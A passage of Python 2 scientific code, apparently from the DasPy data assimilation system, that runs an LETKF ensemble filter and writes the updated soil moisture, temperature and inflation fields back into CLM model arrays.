#print "numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0]",numpy.where(Mask_False_Single_Layer[0] == Obs_Index[0][ny_index])[0][0]
h[ny_index,H_Col_Index] = 1
#
#-------------------------------------=========== Do Data Assimilation ========================================================'
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# For State Estimation
if Write_DA_File_Flag:
#numpy.savetxt(DasPy_Path+"Analysis/DAS_Temp/h.txt", h) # h is too large to save
numpy.savetxt(DasPy_Path+"Analysis/DAS_Temp/E0_SysModel_State.txt", E0_SysModel)
numpy.savetxt(DasPy_Path+"Analysis/DAS_Temp/E0_ObsModel_State.txt", E0_ObsModel)
else:
if Write_DA_File_Flag:
#numpy.savetxt(DasPy_Path+"Analysis/DAS_Temp/h.txt", h) # h is too large to save
numpy.savetxt(DasPy_Path+"Analysis/DAS_Temp/E0_SysModel_Parameter.txt", E0_SysModel)
numpy.savetxt(DasPy_Path+"Analysis/DAS_Temp/E0_ObsModel_Parameter.txt", E0_ObsModel)
# 4D-LETKF
nwindow = 1 # time window for 4D-LETKF
R = numpy.diagflat(Observation_Variance.flatten()[Obs_Index])
GridSize_Sys = abs((MODEL_X_Right - MODEL_X_Left) / Col_Numbers)
GridSize_Obs = abs((MODEL_X_Right - MODEL_X_Left) / Col_Numbers)
#------------------------- Call Assimilation Algorithm --------------------"
ftype = Assim_Algorithm_Name
bf = []
alpha_bias = 0.5 # LETKF Bias Correction Turning Parameter
B = []
gssm_name = 'CLM'
Gssm_model_tag = 'GSSM_CLM'
U1 = [0]
U2 = [0]
#print numpy.shape(Mask[~Mask_Index,:])
#print numpy.shape(E0_SysModel[:,:]),numpy.shape(E0_ObsModel[:,:])
#print nx,ny,numpy.shape(Mask[~Mask_Index,:])
print 'There are ', nx, ' Grids need to be processed! ','nthreads',omp_get_num_procs_ParFor,' Num_Local_Obs ',Num_Local_Obs,"for Block",Block_Index
if Def_Print:
print "numpy.shape(parm_infl)",numpy.shape(parm_infl)
#numpy.savetxt("E0_SysModel.txt",E0_SysModel[:,0:Ensemble_Number])
#numpy.savetxt("E0_ObsModel.txt",E0_ObsModel)
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# For State Estimation
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
State_Layer_Num_Single_Column = 11 + ParFlow_Layer_Num
if Feedback_Assim:
State_Layer_Num_Single_Column = 11 + 15
elif (Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Surface_Temperature"):
State_Layer_Num_Single_Column = 18
if Feedback_Assim:
State_Layer_Num_Single_Column = 18 + 10
else:
State_Layer_Num_Single_Column = 1
elif Parameter_Optimization_Flag:
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
State_Layer_Num_Single_Column = 1
if Feedback_Assim:
State_Layer_Num_Single_Column = 1
elif (Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Surface_Temperature"):
State_Layer_Num_Single_Column = 1
if Feedback_Assim:
State_Layer_Num_Single_Column = 1
else:
State_Layer_Num_Single_Column = 1
if PFT_Par_Sens_Dim >= 1:
Par_Uniform_STD = numpy.asarray(Par_PFT_Uniform_STD,numpy.float32)
Par_Sens_Dim = PFT_Par_Sens_Dim
elif Soil_Par_Sens_Dim >= 1:
Par_Uniform_STD = numpy.asarray(Par_Soil_Uniform_STD,numpy.float32)
Par_Sens_Dim = Soil_Par_Sens_Dim
else:
Par_Uniform_STD = numpy.zeros(1,numpy.float32)
Par_Sens_Dim = 1
if Def_Print:
print "Par_Uniform_STD",Par_Uniform_STD,"Par_Sens_Dim",Par_Sens_Dim
Bias_Forecast_Model_Option = Bias_Estimation_Option_Model[Variable_List.index(SensorVariable)]
Bias_Observation_Model_Option = Bias_Estimation_Option_Obs[Variable_List.index(SensorVariable)]
Bias_Model_Dim = State_DIM_Single_Layer
Bias_Obs_Dim = State_DIM_Single_Layer
Bias_Model_Uniform_STD = numpy.zeros(Bias_Model_Dim)
Bias_Obs_Uniform_STD = numpy.zeros(Bias_Obs_Dim)
Model_Inflation_Uniform_STD = numpy.zeros(nx)
Model_Inflation_Uniform_STD[:] = Model_State_Inflation_Range_STD[Variable_List.index(SensorVariable)]
if PFT_Par_Sens_Dim >= 1 or Soil_Par_Sens_Dim >= 1:
if not numpy.size(Par_Uniform_STD) >= 1:
print "not numpy.size(Par_Uniform_STD) >= 1 !!!!!!!!!!!!!!!!!!!!!!"
os.abort()
############################ BoxCox
minimize_lbfgsb_m = 10
minimize_lbfgsb_iprint = -1
minimize_lbfgsb_factr = 1e1
minimize_lbfgsb_pgtol = 1.0e-5
minimize_lbfgsb_epsilon_in = numpy.asarray([1e-08,1e-08])
try:
xa,innovation,increments,localization_map,bias_a = Call_ReBEL_Octave.ReBEL(gssm_das_octave, letkf, letkf_common, octave,ftype,gssm_name,Gssm_model_tag,nx,ny,nwindow,Ensemble_Number,Num_Local_Obs,eps,Mask[~Mask_Index,:],Obs_Grid,h,B,R,Model_State,E0_SysModel[:,0:Ensemble_Number],E0_ObsModel,
Observation_Corelation_Par,Grid_Resolution_CEA,Grid_Resolution_CEA,bf,alpha_bias, Bias_Forecast_Model_Option, Bias_Observation_Model_Option, msw_infl,parm_infl,Post_Inflation_Alpha,omp_get_num_procs_ParFor,U1,U2,Def_Print,Parameter_Optimization_Flag,
Parameter_Regularization,Par_Uniform_STD,Par_Sens_Dim,State_DIM_Single_Layer,Def_Localization_Temp,Normal_Score_Trans,State_Layer_Num_Single_Column,Bias_Model_Uniform_STD,Bias_Obs_Uniform_STD,Model_Inflation_Uniform_STD,
minimize_lbfgsb_m,minimize_lbfgsb_iprint,minimize_lbfgsb_epsilon_in,minimize_lbfgsb_factr,minimize_lbfgsb_pgtol)
except:
print "**************** User Default Correlation Parameters to Call ReBEL Again!"
Observation_Corelation_Par[0, 0] = 6 # matern Model
Observation_Corelation_Par[1, 0] = 0.0
Observation_Corelation_Par[2, 0] = 1.0
Observation_Corelation_Par[3, 0] = 4.0*Grid_Resolution_CEA
Observation_Corelation_Par[4, 0] = 1.0
xa,innovation,increments,localization_map,bias_a = Call_ReBEL_Octave.ReBEL(gssm_das_octave, letkf, letkf_common, octave,ftype,gssm_name,Gssm_model_tag,nx,ny,nwindow,Ensemble_Number,Num_Local_Obs,eps,Mask[~Mask_Index,:],Obs_Grid,h,B,R,Model_State,E0_SysModel[:,0:Ensemble_Number],E0_ObsModel,
Observation_Corelation_Par,Grid_Resolution_CEA,Grid_Resolution_CEA,bf,alpha_bias, Bias_Forecast_Model_Option, Bias_Observation_Model_Option, msw_infl,parm_infl,Post_Inflation_Alpha,omp_get_num_procs_ParFor,U1,U2,Def_Print,Parameter_Optimization_Flag,
Parameter_Regularization,Par_Uniform_STD,Par_Sens_Dim,State_DIM_Single_Layer,Def_Localization_Temp,Normal_Score_Trans,State_Layer_Num_Single_Column,Bias_Model_Uniform_STD,Bias_Obs_Uniform_STD,Model_Inflation_Uniform_STD,
minimize_lbfgsb_m,minimize_lbfgsb_iprint,minimize_lbfgsb_epsilon_in,minimize_lbfgsb_factr,minimize_lbfgsb_pgtol)
if Def_Print:
print "********************************** Mean Innovation ************************************************"
print "Mean Innovation Value is:",numpy.mean(innovation),"Max Innovation Value is:",numpy.max(innovation),"Min Innovation Value is:",numpy.min(innovation)
print "********************************** Mean Innovation ************************************************"
print "********************************** Mean Increments ************************************************"
print "Mean Increments Value is:",numpy.mean(increments),"Max Increments Value is:",numpy.max(increments),"Min Increments Value is:",numpy.min(increments)
print "********************************** Mean Increments ************************************************"
#print xa[0,:]
#xa,parm_infl = ReBEL(ftype,gssm_name,msw_infl,nx,ny,nwindow,Ensemble_Number,eps,Mask,Obs_Grid,h,R,E0_SysModel,E0_ObsModel,Observation_Corelation_Par,GridSize_Sys,GridSize_Obs,1)
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# State Estimation
# ensemble mean
if (Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Surface_Temperature") or \
(Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Sensible_Heat"):
if Def_Print:
print "******************************************************** Update CLM_Soil_Temperature_Ensemble_Mat"
xm = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
localization_map_col = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
for i in range(State_DIM_Single_Layer):
xm[i] = numpy.mean(xa[i, :])
localization_map_col[i] = localization_map[i]
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+0*State_DIM_Single_Layer):(State_DIM_Single_Layer+(0+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
CLM_Vegetation_Temperature_Ensemble_Mat[:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+1*State_DIM_Single_Layer):(State_DIM_Single_Layer+(1+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
CLM_Ground_Temperature_Ensemble_Mat[:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
for Soil_Layer_Index in range(Soil_Layer_Num):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Index+2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Index+2+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(0*State_DIM_Single_Layer):((0+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
#print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[:,:]),axis=1) * Random_Factor_Normal[Ens_Index]
Analysis_Grid_Array[Ens_Index,::][::] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Def_Print:
print "******************************************************** Update CLM_Soil_Temperature_parm_infl"
Analysis_Grid_Col = Analysis_Grid.flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(0*State_DIM_Single_Layer):((0+1)*State_DIM_Single_Layer)],dtype=numpy.float32)
CLM_Surface_Temperature_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+0*State_DIM_Single_Layer):(State_DIM_Single_Layer+(0+1)*State_DIM_Single_Layer)],dtype=numpy.float32)
CLM_Vegetation_Temperature_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+1*State_DIM_Single_Layer):(State_DIM_Single_Layer+(1+1)*State_DIM_Single_Layer)],dtype=numpy.float32)
CLM_Ground_Temperature_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
for Soil_Layer_Index in range(Soil_Layer_Num):
Analysis_Grid_Col = Analysis_Grid.flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(parm_infl[:])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Index+2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Index+2+1)*State_DIM_Single_Layer)],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
if Def_Print:
print "******************************************************** Update CLM_Soil_Moisture_Ensemble_Mat"
for Ens_Index in range(Ensemble_Number):
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Index+Soil_Layer_Num+2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Index+Soil_Layer_Num+2+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer),:],dtype=numpy.float32),axis=1) * Random_Factor_Normal[Ens_Index]
CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Def_Print:
print "******************************************************** Update CLM_Soil_Moisture_parm_infl"
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Analysis_Grid_Col = Analysis_Grid[::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(parm_infl[:])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Index+Soil_Layer_Num+2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Index+Soil_Layer_Num+2+1)*State_DIM_Single_Layer)],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(parm_infl[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer),:],dtype=numpy.float32),axis=1) * Random_Factor_Normal[Ens_Index]
#print numpy.shape(CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,:,:]),numpy.shape(numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1)))
CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
elif Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
if SensorType == "InSitu":
if Def_Print:
print "******************************************************** Update CLM_Soil_Moisture_Ensemble_Mat"
xm = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
localization_map_col = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
for i in range(State_DIM_Single_Layer):
xm[i] = numpy.mean(xa[Soil_Layer_Index_DA*State_DIM_Single_Layer+i, :])
localization_map_col[i] = localization_map[Soil_Layer_Index_DA*State_DIM_Single_Layer+i]
for Ens_Index in range(Ensemble_Number):
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer),:],dtype=numpy.float32),axis=1) * Random_Factor_Normal[Ens_Index]
CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(Soil_Layer_Index_DA*State_DIM_Single_Layer):((Soil_Layer_Index_DA+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
#print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[:,:]),axis=1) * Random_Factor_Normal[Ens_Index]
Analysis_Grid_Array[Ens_Index,::][::] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Def_Print:
print "******************************************************** Update CLM_Soil_Moisture_parm_infl"
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Analysis_Grid_Col = Analysis_Grid[::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(parm_infl[:])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer)],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(parm_infl[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer),:],dtype=numpy.float32),axis=1) * Random_Factor_Normal[Ens_Index]
#print numpy.shape(CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,:,:]),numpy.shape(numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1)))
CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
if Def_Print:
print "******************************************************** Update CLM_Soil_Temperature_Ensemble_Mat"
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 0)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 0 + 1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
CLM_Vegetation_Temperature_Ensemble_Mat[:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1 + 1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
CLM_Ground_Temperature_Ensemble_Mat[:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
for Soil_Layer_Index in range(Soil_Layer_Num):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + Soil_Layer_Index + 2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + Soil_Layer_Index + 2 + 1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Def_Print:
print "******************************************************** Update CLM_Soil_Temperature_parm_infl"
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 0)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 0 + 1)*State_DIM_Single_Layer)],dtype=numpy.float32)
CLM_Vegetation_Temperature_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1 + 1)*State_DIM_Single_Layer)],dtype=numpy.float32)
CLM_Ground_Temperature_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
for Soil_Layer_Index in range(Soil_Layer_Num):
Analysis_Grid_Col = Analysis_Grid.flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(parm_infl[:])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + Soil_Layer_Index + 2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 5 + Soil_Layer_Index + 2 + 1)*State_DIM_Single_Layer)],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
else:
if Def_Print:
print "******************************************************** Update CLM_Soil_Moisture_Ensemble_Mat"
xm = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
localization_map_col = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
for i in range(State_DIM_Single_Layer):
xm[i] = numpy.mean(xa[i, :])
localization_map_col[i] = localization_map[i]
for Ens_Index in range(Ensemble_Number):
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[((Soil_Layer_Index+1)*State_DIM_Single_Layer):((Soil_Layer_Index+2)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer),:],dtype=numpy.float32),axis=1) * Random_Factor_Normal[Ens_Index]
CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[0:State_DIM_Single_Layer,Ens_Index],dtype=numpy.float32)
#print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[:,:]),axis=1) * Random_Factor_Normal[Ens_Index]
Analysis_Grid_Array[Ens_Index,::][::] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Def_Print:
print "******************************************************** Update CLM_Soil_Moisture_parm_infl"
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Analysis_Grid_Col = Analysis_Grid[::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(parm_infl[:])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[((Soil_Layer_Index+1)*State_DIM_Single_Layer):((Soil_Layer_Index+2)*State_DIM_Single_Layer)],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(parm_infl[(Soil_Layer_Index*State_DIM_Single_Layer):((Soil_Layer_Index+1)*State_DIM_Single_Layer),:],dtype=numpy.float32),axis=1) * Random_Factor_Normal[Ens_Index]
#print numpy.shape(CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,:,:]),numpy.shape(numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1)))
CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
if Def_Print:
print "******************************************************** Update CLM_Soil_Temperature_Ensemble_Mat"
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1 + 1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
CLM_Vegetation_Temperature_Ensemble_Mat[:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 2 + 1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
CLM_Ground_Temperature_Ensemble_Mat[:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
for Soil_Layer_Index in range(Soil_Layer_Num):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + Soil_Layer_Index + 3)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + Soil_Layer_Index + 3 + 1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Def_Print:
print "******************************************************** Update CLM_Soil_Temperature_parm_infl"
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 1 + 1)*State_DIM_Single_Layer)],dtype=numpy.float32)
CLM_Vegetation_Temperature_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 2)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + 2 + 1)*State_DIM_Single_Layer)],dtype=numpy.float32)
CLM_Ground_Temperature_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
for Soil_Layer_Index in range(Soil_Layer_Num):
Analysis_Grid_Col = Analysis_Grid.flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(parm_infl[:])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + Soil_Layer_Index + 3)*State_DIM_Single_Layer):(State_DIM_Single_Layer+(Soil_Layer_Num - 6 + Soil_Layer_Index + 3 + 1)*State_DIM_Single_Layer)],dtype=numpy.float32)
# #print Analysis_Grid_Col[~Mask_Index]
CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
else:
if Def_Print:
print "******************************************************** Update Prop_Grid_Array_Sys"
xm = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
localization_map_col = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
for i in range(State_DIM_Single_Layer):
xm[i] = numpy.mean(xa[i, :])
